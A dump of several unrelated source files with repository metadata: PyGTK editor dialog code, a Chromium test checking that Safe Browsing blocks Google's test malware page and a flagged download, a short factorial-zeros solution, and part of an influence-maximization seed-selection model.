if response == gtk.RESPONSE_CANCEL or \
response == gtk.RESPONSE_REJECT or \
response == gtk.RESPONSE_CLOSE or \
response == gtk.RESPONSE_DELETE_EVENT:
response = gtk.RESPONSE_CANCEL
dialog.destroy()
return response
def area_key(win, event, cancel):
#print event
if event.keyval == gtk.keysyms.y or \
event.keyval == gtk.keysyms.Y:
win.response(gtk.RESPONSE_YES)
if event.keyval == gtk.keysyms.n or \
event.keyval == gtk.keysyms.N:
win.response(gtk.RESPONSE_NO)
if cancel:
if event.keyval == gtk.keysyms.c or \
event.keyval == gtk.keysyms.C:
win.response(gtk.RESPONSE_CANCEL)
# ------------------------------------------------------------------------
# Show About dialog:
import platform
def about():
dialog = gtk.AboutDialog()
dialog.set_name(" PyEdit - Python Editor ")
dialog.set_version(str(pyedlib.pedconfig.conf.version));
comm = "\nPython based easily configurable editor.\n"\
"\nRunning PyGtk %d.%d.%d" % gtk.pygtk_version +\
"\nRunning GTK %d.%d.%d\n" % gtk.gtk_version +\
"\nRunning Python %s\n" % platform.python_version()
dialog.set_comments(comm);
dialog.set_copyright("Portions \302\251 Copyright Peter Glen\n"
"Project placed in the Public Domain.")
img_dir = os.path.join(os.path.dirname(__file__), 'images')
img_path = os.path.join(img_dir, 'gtk-logo-rgb.gif')
try:
pixbuf = gtk.gdk.pixbuf_new_from_file(img_path)
#print "loaded pixbuf"
dialog.set_logo(pixbuf)
except gobject.GError, error:
print "Cannot load logo for about dialog";
#dialog.set_website("")
## Close dialog on user response
dialog.connect ("response", lambda d, r: d.destroy())
dialog.connect("key-press-event", about_key)
dialog.show()
def about_key(win, event):
#print "about_key", event
if event.type == gtk.gdk.KEY_PRESS:
if event.keyval == gtk.keysyms.x or event.keyval == gtk.keysyms.X:
if event.state & gtk.gdk.MOD1_MASK:
win.destroy()
# Show a regular message:
def message(strx, title = None, icon = gtk.MESSAGE_INFO):
dialog = gtk.MessageDialog(None, gtk.DIALOG_DESTROY_WITH_PARENT,
icon, gtk.BUTTONS_CLOSE, strx)
if title:
dialog.set_title(title)
else:
dialog.set_title("pyedit")
# Close dialog on user response
dialog.connect("response", lambda d, r: d.destroy())
dialog.show()
| [
"[email protected]"
] | |
a58a9d7303bef7ea14954d5a6376cf8f18b14d02 | fe91ffa11707887e4cdddde8f386a8c8e724aa58 | /chrome/test/enterprise/e2e/policy/safe_browsing/safe_browsing_ui_test.py | 296faf0623b41a371544722ac0962d719d89d5de | [
"BSD-3-Clause"
] | permissive | akshaymarch7/chromium | 78baac2b45526031846ccbaeca96c639d1d60ace | d273c844a313b1e527dec0d59ce70c95fd2bd458 | refs/heads/master | 2023-02-26T23:48:03.686055 | 2020-04-15T01:20:07 | 2020-04-15T01:20:07 | 255,778,651 | 2 | 1 | BSD-3-Clause | 2020-04-15T02:04:56 | 2020-04-15T02:04:55 | null | UTF-8 | Python | false | false | 2,371 | py | # Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
import test_util
import time
from absl import app
from selenium import webdriver
from pywinauto.application import Application
UnsafePageLink = "http://testsafebrowsing.appspot.com/s/malware.html"
UnsafePageLinkTabText = "Security error"
UnsafeDownloadLink = "http://testsafebrowsing.appspot.com/s/badrep.exe"
UnsafeDownloadTextRe = ".* is dangerous,\s*so\s*Chrom.* has blocked it"
def visit(window, url):
"""Visit a specific URL through pywinauto.Application.
SafeBrowsing intercepts HTTP requests & hangs WebDriver.get(), which prevents
us from getting the page source. Using pywinauto to visit the pages instead.
"""
window.Edit.set_edit_text(url).type_keys("%{ENTER}")
time.sleep(10)
def main(argv):
exclude_switches = ["disable-background-networking"]
chrome_options = webdriver.ChromeOptions()
chrome_options.add_experimental_option("excludeSwitches", exclude_switches)
driver = test_util.create_chrome_webdriver(chrome_options=chrome_options)
app = Application(backend="uia")
app.connect(title_re='.*Chrome|.*Chromium')
window = app.top_window()
# Wait for Chrome to download SafeBrowsing lists in the background.
# There's no trigger to force this operation or synchronize on it, but quick
# experiments have shown 3-4 minutes in most cases, so 5 should be plenty.
time.sleep(60 * 5)
print "Visiting unsafe page: %s" % UnsafePageLink
visit(window, UnsafePageLink)
unsafe_page = False
for desc in app.top_window().descendants():
if desc.window_text():
print "unsafe_page.item: %s" % desc.window_text()
if UnsafePageLinkTabText in desc.window_text():
unsafe_page = True
break
print "Downloading unsafe file: %s" % UnsafeDownloadLink
visit(window, UnsafeDownloadLink)
unsafe_download = False
for desc in app.top_window().descendants():
if desc.window_text():
print "unsafe_download.item: %s" % desc.window_text()
if re.search(UnsafeDownloadTextRe, desc.window_text()):
unsafe_download = True
break
print "RESULTS.unsafe_page: %s" % unsafe_page
print "RESULTS.unsafe_download: %s" % unsafe_download
driver.quit()
if __name__ == '__main__':
app.run(main)
| [
"[email protected]"
] | |
61a13c91993c787854fd3d4282aba7d225cc06e8 | 4b32cbc767e8cc0d61e7771b8a6d5c7c9b324a97 | /Python/1676 (팩토리얼 0의 개수,수학).py | 1f1b2191894cf9d0e4754ced7350cb220d5c75dc | [] | no_license | Jongminfire/Baekjoon | 45e554c983fa583ca7a1709e1ac435e1a38e075b | 8dc0ec58ddc43de2dd44b3b1af9346f708c1208e | refs/heads/master | 2023-07-29T10:35:52.648825 | 2021-09-14T15:12:22 | 2021-09-14T15:12:22 | 247,514,920 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | n = int(input())
print(n//5+n//25+n//125)
# 팩토리얼 0의 개수는 5의 x제곱일 때 x만큼 늘어난다
| [
"[email protected]"
] | |
a8b6f5e111d6183e5069a6819cb3177032881f29 | 672c454454cc62a49d0caf74558c265c7db4228f | /Model.py | 428fe5396ea2642e37d6dd7c1f008ff649c0a003 | [] | no_license | nmaypeter/project_nw_200505 | cd0ce01ce07c41683ca96b0dac3960bfac6b8ffd | f0871506f8ed4dbdd8e1b1a0dcbfa20196a652b7 | refs/heads/master | 2022-07-29T23:16:10.271862 | 2020-05-17T16:37:07 | 2020-05-17T16:37:07 | 261,580,722 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 42,600 | py | from SeedSelection import *
from Evaluation import *
import time
import copy
import math
class Model:
def __init__(self, mn_list, data_key, prod_key, cas_key, wallet_key=0):
self.model_name = get_model_name(mn_list)
self.r_flag = mn_list[1]
self.mn_list = mn_list
self.data_name = dataset_name_dict[data_key]
self.prod_name = product_name_dict[prod_key]
self.cas_name = cascade_model_dict[cas_key]
self.data_key = data_key
self.prod_key = prod_key
self.cas_key = cas_key
self.wallet_type = wallet_distribution_type_dict[wallet_key]
self.wallet_key = wallet_key
self.wd_seq = [wd for wd in wallet_distribution_type_dict.keys() if wd != 0]
self.budget_iteration = [i for i in range(10, 6, -1)]
self.monte_carlo = 100
def model_dag(self):
ini = Initialization(self.data_key, self.prod_key, self.cas_key, self.wallet_key)
seed_cost_dict = ini.constructSeedCostDict()
graph_dict = ini.constructGraphDict()
product_list, epw_list = ini.constructProductList()
num_product = len(product_list)
total_cost = sum(seed_cost_dict[i] for i in seed_cost_dict)
seed_set_sequence = [-1 for _ in range(len(self.budget_iteration))]
ss_time_sequence = [-1 for _ in range(len(self.budget_iteration))]
seed_data_sequence = [-1 for _ in range(len(self.budget_iteration))]
dag_class = int(list(model_dict['method'][self.mn_list[0]])[-1])
ssmioa_model = SeedSelectionMIOA(graph_dict, seed_cost_dict, product_list, epw_list, dag_class, self.r_flag)
ss_start_time = time.time()
bud_iteration = self.budget_iteration.copy()
now_b_iter = bud_iteration.pop(0)
now_budget, now_profit = 0.0, 0.0
seed_set = [set() for _ in range(num_product)]
wd_seq = [self.wallet_key] if wallet_distribution_type_dict[self.wallet_key] else self.wd_seq
mioa_dict = ssmioa_model.generateMIOA()
celf_heap = ssmioa_model.generateCelfHeap(mioa_dict)
ss_acc_time = round(time.time() - ss_start_time, 4)
temp_sequence = [[ss_acc_time, now_budget, now_profit, seed_set, celf_heap]]
temp_seed_data = [['time\tk_prod\ti_node\tnow_budget\tnow_profit\tseed_num\n']]
while temp_sequence:
ss_start_time = time.time()
now_bi_index = self.budget_iteration.index(now_b_iter)
total_budget = safe_div(total_cost, 2 ** now_b_iter)
[ss_acc_time, now_budget, now_profit, seed_set, celf_heap] = temp_sequence.pop()
seed_data = temp_seed_data.pop()
print('@ selection\t' + self.model_name + ' @ ' + self.data_name + '_' + self.cas_name +
'\t' + self.wallet_type + '_' + self.prod_name + '_bi' + str(now_b_iter) + ', budget = ' + str(total_budget))
celf_heap_c = []
while now_budget < total_budget and celf_heap:
mep_item = heap.heappop_max(celf_heap)
mep_mg, mep_k_prod, mep_i_node, mep_flag = mep_item
sc = seed_cost_dict[mep_i_node]
if round(now_budget + sc, 4) >= total_budget and bud_iteration and not temp_sequence:
celf_heap_c = copy.deepcopy(celf_heap)
seed_set_length = sum(len(seed_set[k]) for k in range(num_product))
if round(now_budget + sc, 4) >= total_budget and bud_iteration and not temp_sequence:
ss_time = round(time.time() - ss_start_time + ss_acc_time, 4)
now_b_iter = bud_iteration.pop(0)
temp_sequence.append([ss_time, now_budget, now_profit, copy.deepcopy(seed_set), celf_heap_c])
temp_seed_data.append(seed_data.copy())
if round(now_budget + sc, 4) > total_budget:
continue
if mep_flag == seed_set_length:
seed_set[mep_k_prod].add(mep_i_node)
now_budget = round(now_budget + sc, 4)
now_profit = round(now_profit + (mep_mg * (sc if self.r_flag else 1.0)), 4)
seed_data.append(str(round(time.time() - ss_start_time + ss_acc_time, 4)) + '\t' + str(mep_k_prod) + '\t' + str(mep_i_node) + '\t' +
str(now_budget) + '\t' + str(now_profit) + '\t' + str([len(seed_set[k]) for k in range(num_product)]) + '\n')
else:
seed_set_t = copy.deepcopy(seed_set)
seed_set_t[mep_k_prod].add(mep_i_node)
dag_dict = [{} for _ in range(num_product)]
if dag_class == 1:
dag_dict = ssmioa_model.generateDAG1(mioa_dict, seed_set_t)
elif dag_class == 2:
dag_dict = ssmioa_model.generateDAG2(mioa_dict, seed_set_t)
ep_t = ssmioa_model.calculateExpectedProfit(dag_dict, seed_set_t)
mg_t = safe_div(round(ep_t - now_profit, 4), sc if self.r_flag else 1.0)
flag_t = seed_set_length
if mg_t > 0:
celf_item_t = (mg_t, mep_k_prod, mep_i_node, flag_t)
heap.heappush_max(celf_heap, celf_item_t)
ss_time = round(time.time() - ss_start_time + ss_acc_time, 4)
print('ss_time = ' + str(ss_time) + 'sec, cost = ' + str(now_budget) + ', seed_set_length = ' + str([len(s_set_k) for s_set_k in seed_set]))
seed_set_sequence[now_bi_index] = seed_set
ss_time_sequence[now_bi_index] = ss_time
seed_data_sequence[now_bi_index] = seed_data
for wd in wd_seq:
seed_data_path = 'seed_data/' + self.data_name + '_' + self.cas_name
if not os.path.isdir(seed_data_path):
os.mkdir(seed_data_path)
seed_data_path0 = seed_data_path + '/' + wallet_distribution_type_dict[wd] + '_' + self.prod_name + '_bi' + str(self.budget_iteration[now_bi_index])
if not os.path.isdir(seed_data_path0):
os.mkdir(seed_data_path0)
seed_data_file = open(seed_data_path0 + '/' + self.model_name + '.txt', 'w')
for sd in seed_data:
seed_data_file.write(sd)
seed_data_file.close()
while -1 in seed_data_sequence:
no_data_index = seed_data_sequence.index(-1)
seed_set_sequence[no_data_index] = seed_set_sequence[no_data_index - 1]
ss_time_sequence[no_data_index] = ss_time_sequence[no_data_index - 1]
seed_data_sequence[no_data_index] = seed_data_sequence[no_data_index - 1]
eva_model = EvaluationM(self.mn_list, self.data_key, self.prod_key, self.cas_key)
for bi in self.budget_iteration:
now_bi_index = self.budget_iteration.index(bi)
if wallet_distribution_type_dict[self.wallet_key]:
eva_model.evaluate(bi, self.wallet_key, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
else:
for wd in self.wd_seq:
eva_model.evaluate(bi, wd, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
def model_spbp(self):
ini = Initialization(self.data_key, self.prod_key, self.cas_key, self.wallet_key)
seed_cost_dict = ini.constructSeedCostDict()
graph_dict = ini.constructGraphDict()
product_list, epw_list = ini.constructProductList()
num_product = len(product_list)
total_cost = sum(seed_cost_dict[i] for i in seed_cost_dict)
seed_set_sequence = [-1 for _ in range(len(self.budget_iteration))]
ss_time_sequence = [-1 for _ in range(len(self.budget_iteration))]
seed_data_sequence = [-1 for _ in range(len(self.budget_iteration))]
dag_class = int(list(model_dict['method'][self.mn_list[0]])[-1])
ssmioa_model = SeedSelectionMIOA(graph_dict, seed_cost_dict, product_list, epw_list, dag_class, self.r_flag)
ssspbp_model = SeedSelectionSPBP(graph_dict, seed_cost_dict, product_list, epw_list, dag_class, self.r_flag)
for now_b_iter in self.budget_iteration:
ss_start_time = time.time()
now_budget, now_profit = 0.0, 0.0
now_bi_index = self.budget_iteration.index(now_b_iter)
total_budget = safe_div(total_cost, 2 ** now_b_iter)
seed_set = [set() for _ in range(num_product)]
wd_seq = [self.wallet_key] if wallet_distribution_type_dict[self.wallet_key] else self.wd_seq
mioa_dict, ps_dict = ssspbp_model.generateMIOA()
celf_dict, max_s = ssspbp_model.generateCelfDict(mioa_dict, total_budget)
seed_data = ['time\tk_prod\ti_node\tnow_budget\tnow_profit\tseed_num\n']
print('@ selection\t' + get_model_name(self.mn_list) + ' @ ' + dataset_name_dict[self.data_key] + '_' + cascade_model_dict[self.cas_key] +
'\t' + wallet_distribution_type_dict[self.wallet_key] + '_' + product_name_dict[self.prod_key] + '_bi' + str(now_b_iter) + ', budget = ' + str(total_budget))
while now_budget < total_budget and celf_dict:
mep_k_prod, mep_i_node = max(celf_dict, key=celf_dict.get)
mep_mg = max(celf_dict.values())
del celf_dict[(mep_k_prod, mep_i_node)]
sc = seed_cost_dict[mep_i_node]
if round(now_budget + sc, 4) > total_budget:
continue
seed_set[mep_k_prod].add(mep_i_node)
now_budget = round(now_budget + sc, 4)
now_profit = round(now_profit + (mep_mg * (sc if self.r_flag else 1.0)), 4)
seed_data.append(str(round(time.time() - ss_start_time, 4)) + '\t' + str(mep_k_prod) + '\t' + str(mep_i_node) + '\t' +
str(now_budget) + '\t' + str(now_profit) + '\t' + str([len(seed_set[k]) for k in range(num_product)]) + '\n')
delta_max = 0.0
for (k, i) in ps_dict[mep_k_prod][mep_i_node]:
if i in seed_set[k]:
continue
if (k, i) not in celf_dict:
continue
if celf_dict[(k, i)] > delta_max:
seed_set_t = copy.deepcopy(seed_set)
seed_set_t[mep_k_prod].add(mep_i_node)
dag_dict = [{} for _ in range(num_product)]
if dag_class == 1:
dag_dict = ssmioa_model.generateDAG1(mioa_dict, seed_set_t)
elif dag_class == 2:
dag_dict = ssmioa_model.generateDAG2(mioa_dict, seed_set_t)
ep_t = ssmioa_model.calculateExpectedProfit(dag_dict, seed_set_t)
mg_t = round(ep_t - now_profit, 4)
mg_t = safe_div(mg_t, sc) if self.r_flag else mg_t
celf_dict[(k, i)] = mg_t
delta_max = mg_t if mg_t > delta_max else delta_max
if max_s[0] > now_profit and max_s[-1] != '-1':
seed_set = [set() for _ in range(num_product)]
seed_set[max_s[1]].add(max_s[2])
ss_time = round(time.time() - ss_start_time, 4)
print('ss_time = ' + str(ss_time) + 'sec, cost = ' + str(now_budget) + ', seed_set_length = ' + str([len(s_set_k) for s_set_k in seed_set]))
seed_set_sequence[now_bi_index] = seed_set
ss_time_sequence[now_bi_index] = ss_time
seed_data_sequence[now_bi_index] = seed_data
for wd in wd_seq:
seed_data_path = 'seed_data/' + self.data_name + '_' + self.cas_name
if not os.path.isdir(seed_data_path):
os.mkdir(seed_data_path)
seed_data_path0 = seed_data_path + '/' + wallet_distribution_type_dict[wd] + '_' + self.prod_name + '_bi' + str(self.budget_iteration[now_bi_index])
if not os.path.isdir(seed_data_path0):
os.mkdir(seed_data_path0)
seed_data_file = open(seed_data_path0 + '/' + self.model_name + '.txt', 'w')
for sd in seed_data:
seed_data_file.write(sd)
seed_data_file.close()
while -1 in seed_data_sequence:
no_data_index = seed_data_sequence.index(-1)
seed_set_sequence[no_data_index] = seed_set_sequence[no_data_index - 1]
ss_time_sequence[no_data_index] = ss_time_sequence[no_data_index - 1]
seed_data_sequence[no_data_index] = seed_data_sequence[no_data_index - 1]
eva_model = EvaluationM(self.mn_list, self.data_key, self.prod_key, self.cas_key)
for bi in self.budget_iteration:
now_bi_index = self.budget_iteration.index(bi)
if wallet_distribution_type_dict[self.wallet_key]:
eva_model.evaluate(bi, self.wallet_key, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
else:
for wd in self.wd_seq:
eva_model.evaluate(bi, wd, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
def model_ng(self):
ini = Initialization(self.data_key, self.prod_key, self.cas_key, self.wallet_key)
seed_cost_dict = ini.constructSeedCostDict()
graph_dict = ini.constructGraphDict()
product_list, epw_list = ini.constructProductList()
num_product = len(product_list)
total_cost = sum(seed_cost_dict[i] for i in seed_cost_dict)
seed_set_sequence = [-1 for _ in range(len(self.budget_iteration))]
ss_time_sequence = [-1 for _ in range(len(self.budget_iteration))]
seed_data_sequence = [-1 for _ in range(len(self.budget_iteration))]
ssng_model = SeedSelectionNG(graph_dict, seed_cost_dict, product_list, epw_list, self.r_flag)
ss_start_time = time.time()
bud_iteration = self.budget_iteration.copy()
now_b_iter = bud_iteration.pop(0)
now_budget, now_profit = 0.0, 0.0
seed_set = [set() for _ in range(num_product)]
wd_seq = [self.wallet_key] if wallet_distribution_type_dict[self.wallet_key] else self.wd_seq
celf_heap = ssng_model.generateCelfHeap()
ss_acc_time = round(time.time() - ss_start_time, 4)
temp_sequence = [[ss_acc_time, now_budget, now_profit, seed_set, celf_heap]]
temp_seed_data = [['time\tk_prod\ti_node\tnow_budget\tnow_profit\tseed_num\n']]
while temp_sequence:
ss_start_time = time.time()
now_bi_index = self.budget_iteration.index(now_b_iter)
total_budget = safe_div(total_cost, 2 ** now_b_iter)
[ss_acc_time, now_budget, now_profit, seed_set, celf_heap] = temp_sequence.pop()
seed_data = temp_seed_data.pop()
print('@ selection\t' + get_model_name(self.mn_list) + ' @ ' + dataset_name_dict[self.data_key] + '_' + cascade_model_dict[self.cas_key] +
'\t' + wallet_distribution_type_dict[self.wallet_key] + '_' + product_name_dict[self.prod_key] + '_bi' + str(now_b_iter) + ', budget = ' + str(total_budget))
celf_heap_c = []
while now_budget < total_budget and celf_heap:
mep_item = heap.heappop_max(celf_heap)
mep_mg, mep_k_prod, mep_i_node, mep_flag = mep_item
sc = seed_cost_dict[mep_i_node]
if round(now_budget + sc, 4) >= total_budget and bud_iteration and not temp_sequence:
celf_heap_c = copy.deepcopy(celf_heap)
seed_set_length = sum(len(seed_set[k]) for k in range(num_product))
if round(now_budget + sc, 4) >= total_budget and bud_iteration and not temp_sequence:
ss_time = round(time.time() - ss_start_time + ss_acc_time, 4)
now_b_iter = bud_iteration.pop(0)
temp_sequence.append([ss_time, now_budget, now_profit, copy.deepcopy(seed_set), celf_heap_c])
temp_seed_data.append(seed_data.copy())
if round(now_budget + sc, 4) > total_budget:
continue
if mep_flag == seed_set_length:
seed_set[mep_k_prod].add(mep_i_node)
now_budget = round(now_budget + sc, 4)
now_profit = ssng_model.getSeedSetProfit(seed_set)
seed_data.append(str(round(time.time() - ss_start_time + ss_acc_time, 4)) + '\t' + str(mep_k_prod) + '\t' + str(mep_i_node) + '\t' +
str(now_budget) + '\t' + str(now_profit) + '\t' + str([len(seed_set[k]) for k in range(num_product)]) + '\n')
else:
seed_set_t = copy.deepcopy(seed_set)
seed_set_t[mep_k_prod].add(mep_i_node)
ep_t = ssng_model.getSeedSetProfit(seed_set_t)
mg_t = round(ep_t - now_profit, 4)
if self.r_flag:
mg_t = safe_div(mg_t, sc)
flag_t = seed_set_length
if mg_t > 0:
celf_item_t = (mg_t, mep_k_prod, mep_i_node, flag_t)
heap.heappush_max(celf_heap, celf_item_t)
ss_time = round(time.time() - ss_start_time + ss_acc_time, 4)
print('ss_time = ' + str(ss_time) + 'sec, cost = ' + str(now_budget) + ', seed_set_length = ' + str([len(s_set_k) for s_set_k in seed_set]))
seed_set_sequence[now_bi_index] = seed_set
ss_time_sequence[now_bi_index] = ss_time
seed_data_sequence[now_bi_index] = seed_data
for wd in wd_seq:
seed_data_path = 'seed_data/' + self.data_name + '_' + self.cas_name
if not os.path.isdir(seed_data_path):
os.mkdir(seed_data_path)
seed_data_path0 = seed_data_path + '/' + wallet_distribution_type_dict[wd] + '_' + self.prod_name + '_bi' + str(self.budget_iteration[now_bi_index])
if not os.path.isdir(seed_data_path0):
os.mkdir(seed_data_path0)
seed_data_file = open(seed_data_path0 + '/' + self.model_name + '.txt', 'w')
for sd in seed_data:
seed_data_file.write(sd)
seed_data_file.close()
while -1 in seed_data_sequence:
no_data_index = seed_data_sequence.index(-1)
seed_set_sequence[no_data_index] = seed_set_sequence[no_data_index - 1]
ss_time_sequence[no_data_index] = ss_time_sequence[no_data_index - 1]
seed_data_sequence[no_data_index] = seed_data_sequence[no_data_index - 1]
eva_model = EvaluationM(self.mn_list, self.data_key, self.prod_key, self.cas_key)
for bi in self.budget_iteration:
now_bi_index = self.budget_iteration.index(bi)
if wallet_distribution_type_dict[self.wallet_key]:
eva_model.evaluate(bi, self.wallet_key, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
else:
for wd in self.wd_seq:
eva_model.evaluate(bi, wd, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
def model_hd(self):
ini = Initialization(self.data_key, self.prod_key, self.cas_key, self.wallet_key)
seed_cost_dict = ini.constructSeedCostDict()
graph_dict = ini.constructGraphDict()
product_list, epw_list = ini.constructProductList()
num_product = len(product_list)
total_cost = sum(seed_cost_dict[i] for i in seed_cost_dict)
seed_set_sequence = [-1 for _ in range(len(self.budget_iteration))]
ss_time_sequence = [-1 for _ in range(len(self.budget_iteration))]
seed_data_sequence = [-1 for _ in range(len(self.budget_iteration))]
sshd_model = SeedSelectionHD(graph_dict, product_list)
ss_start_time = time.time()
bud_iteration = self.budget_iteration.copy()
now_b_iter = bud_iteration.pop(0)
now_budget = 0.0
seed_set = [set() for _ in range(num_product)]
wd_seq = [self.wallet_key] if wallet_distribution_type_dict[self.wallet_key] else self.wd_seq
degree_heap = sshd_model.generateDegreeHeap()
ss_acc_time = round(time.time() - ss_start_time, 4)
temp_sequence = [[ss_acc_time, now_budget, seed_set, degree_heap]]
temp_seed_data = [['time\tk_prod\ti_node\tnow_budget\tnow_profit\tseed_num\n']]
while temp_sequence:
ss_start_time = time.time()
now_bi_index = self.budget_iteration.index(now_b_iter)
total_budget = safe_div(total_cost, 2 ** now_b_iter)
[ss_acc_time, now_budget, seed_set, degree_heap] = temp_sequence.pop()
seed_data = temp_seed_data.pop()
print('@ selection\t' + get_model_name(self.mn_list) + ' @ ' + dataset_name_dict[self.data_key] + '_' + cascade_model_dict[self.cas_key] +
'\t' + wallet_distribution_type_dict[self.wallet_key] + '_' + product_name_dict[self.prod_key] + '_bi' + str(now_b_iter) + ', budget = ' + str(total_budget))
degree_heap_c = []
while now_budget < total_budget and degree_heap:
mep_item = heap.heappop_max(degree_heap)
mep_deg, mep_k_prod, mep_i_node = mep_item
sc = seed_cost_dict[mep_i_node]
if round(now_budget + sc, 4) >= total_budget and bud_iteration and not temp_sequence:
degree_heap_c = copy.deepcopy(degree_heap)
if round(now_budget + sc, 4) >= total_budget and bud_iteration and not temp_sequence:
ss_time = round(time.time() - ss_start_time + ss_acc_time, 4)
now_b_iter = bud_iteration.pop(0)
temp_sequence.append([ss_time, now_budget, copy.deepcopy(seed_set), degree_heap_c])
temp_seed_data.append(seed_data.copy())
if round(now_budget + sc, 4) > total_budget:
continue
seed_set[mep_k_prod].add(mep_i_node)
now_budget = round(now_budget + sc, 4)
seed_data.append(str(round(time.time() - ss_start_time + ss_acc_time, 4)) + '\t' + str(mep_k_prod) + '\t' + str(mep_i_node) + '\t' +
str(now_budget) + '\t' + str([len(seed_set[k]) for k in range(num_product)]) + '\n')
ss_time = round(time.time() - ss_start_time + ss_acc_time, 4)
print('ss_time = ' + str(ss_time) + 'sec, cost = ' + str(now_budget) + ', seed_set_length = ' + str([len(s_set_k) for s_set_k in seed_set]))
seed_set_sequence[now_bi_index] = seed_set
ss_time_sequence[now_bi_index] = ss_time
seed_data_sequence[now_bi_index] = seed_data
for wd in wd_seq:
seed_data_path = 'seed_data/' + self.data_name + '_' + self.cas_name
if not os.path.isdir(seed_data_path):
os.mkdir(seed_data_path)
seed_data_path0 = seed_data_path + '/' + wallet_distribution_type_dict[wd] + '_' + self.prod_name + '_bi' + str(self.budget_iteration[now_bi_index])
if not os.path.isdir(seed_data_path0):
os.mkdir(seed_data_path0)
seed_data_file = open(seed_data_path0 + '/' + self.model_name + '.txt', 'w')
for sd in seed_data:
seed_data_file.write(sd)
seed_data_file.close()
while -1 in seed_data_sequence:
no_data_index = seed_data_sequence.index(-1)
seed_set_sequence[no_data_index] = seed_set_sequence[no_data_index - 1]
ss_time_sequence[no_data_index] = ss_time_sequence[no_data_index - 1]
seed_data_sequence[no_data_index] = seed_data_sequence[no_data_index - 1]
eva_model = EvaluationM(self.mn_list, self.data_key, self.prod_key, self.cas_key)
for bi in self.budget_iteration:
now_bi_index = self.budget_iteration.index(bi)
if wallet_distribution_type_dict[self.wallet_key]:
eva_model.evaluate(bi, self.wallet_key, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
else:
for wd in self.wd_seq:
eva_model.evaluate(bi, wd, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
def model_r(self):
ini = Initialization(self.data_key, self.prod_key, self.cas_key, self.wallet_key)
seed_cost_dict = ini.constructSeedCostDict()
graph_dict = ini.constructGraphDict()
product_list, epw_list = ini.constructProductList()
num_product = len(product_list)
total_cost = sum(seed_cost_dict[i] for i in seed_cost_dict)
seed_set_sequence = [-1 for _ in range(len(self.budget_iteration))]
ss_time_sequence = [-1 for _ in range(len(self.budget_iteration))]
seed_data_sequence = [-1 for _ in range(len(self.budget_iteration))]
ss_start_time = time.time()
bud_iteration = self.budget_iteration.copy()
now_b_iter = bud_iteration.pop(0)
now_budget = 0.0
seed_set = [set() for _ in range(num_product)]
wd_seq = [self.wallet_key] if wallet_distribution_type_dict[self.wallet_key] else self.wd_seq
random_node_list = [(k, i) for i in graph_dict for k in range(num_product)]
random.shuffle(random_node_list)
ss_acc_time = round(time.time() - ss_start_time, 4)
temp_sequence = [[ss_acc_time, now_budget, seed_set, random_node_list]]
temp_seed_data = [['time\tk_prod\ti_node\tnow_budget\tnow_profit\tseed_num\n']]
while temp_sequence:
ss_start_time = time.time()
now_bi_index = self.budget_iteration.index(now_b_iter)
total_budget = safe_div(total_cost, 2 ** now_b_iter)
[ss_acc_time, now_budget, seed_set, random_node_list] = temp_sequence.pop()
seed_data = temp_seed_data.pop()
print('@ selection\t' + get_model_name(self.mn_list) + ' @ ' + dataset_name_dict[self.data_key] + '_' + cascade_model_dict[self.cas_key] +
'\t' + wallet_distribution_type_dict[self.wallet_key] + '_' + product_name_dict[self.prod_key] + '_bi' + str(now_b_iter) + ', budget = ' + str(total_budget))
random_node_list_c = []
while now_budget < total_budget and random_node_list:
mep_item = random_node_list.pop(0)
mep_k_prod, mep_i_node = mep_item
sc = seed_cost_dict[mep_i_node]
if round(now_budget + sc, 4) >= total_budget and bud_iteration and not temp_sequence:
random_node_list_c = copy.deepcopy(random_node_list)
if round(now_budget + sc, 4) >= total_budget and bud_iteration and not temp_sequence:
ss_time = round(time.time() - ss_start_time + ss_acc_time, 4)
now_b_iter = bud_iteration.pop(0)
temp_sequence.append([ss_time, now_budget, copy.deepcopy(seed_set), random_node_list_c])
temp_seed_data.append(seed_data.copy())
if round(now_budget + sc, 4) > total_budget:
continue
seed_set[mep_k_prod].add(mep_i_node)
now_budget = round(now_budget + sc, 4)
seed_data.append(str(round(time.time() - ss_start_time + ss_acc_time, 4)) + '\t' + str(mep_k_prod) + '\t' + str(mep_i_node) + '\t' +
str(now_budget) + '\t' + str([len(seed_set[k]) for k in range(num_product)]) + '\n')
ss_time = round(time.time() - ss_start_time + ss_acc_time, 4)
print('ss_time = ' + str(ss_time) + 'sec, cost = ' + str(now_budget) + ', seed_set_length = ' + str([len(s_set_k) for s_set_k in seed_set]))
seed_set_sequence[now_bi_index] = seed_set
ss_time_sequence[now_bi_index] = ss_time
seed_data_sequence[now_bi_index] = seed_data
for wd in wd_seq:
seed_data_path = 'seed_data/' + self.data_name + '_' + self.cas_name
if not os.path.isdir(seed_data_path):
os.mkdir(seed_data_path)
seed_data_path0 = seed_data_path + '/' + wallet_distribution_type_dict[wd] + '_' + self.prod_name + '_bi' + str(self.budget_iteration[now_bi_index])
if not os.path.isdir(seed_data_path0):
os.mkdir(seed_data_path0)
seed_data_file = open(seed_data_path0 + '/' + self.model_name + '.txt', 'w')
for sd in seed_data:
seed_data_file.write(sd)
seed_data_file.close()
while -1 in seed_data_sequence:
no_data_index = seed_data_sequence.index(-1)
seed_set_sequence[no_data_index] = seed_set_sequence[no_data_index - 1]
ss_time_sequence[no_data_index] = ss_time_sequence[no_data_index - 1]
seed_data_sequence[no_data_index] = seed_data_sequence[no_data_index - 1]
eva_model = EvaluationM(self.mn_list, self.data_key, self.prod_key, self.cas_key)
for bi in self.budget_iteration:
now_bi_index = self.budget_iteration.index(bi)
if wallet_distribution_type_dict[self.wallet_key]:
eva_model.evaluate(bi, self.wallet_key, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
else:
for wd in self.wd_seq:
eva_model.evaluate(bi, wd, seed_set_sequence[now_bi_index], ss_time_sequence[now_bi_index])
def model_pmis(self):
ini = Initialization(self.data_key, self.prod_key, self.cas_key, self.wallet_key)
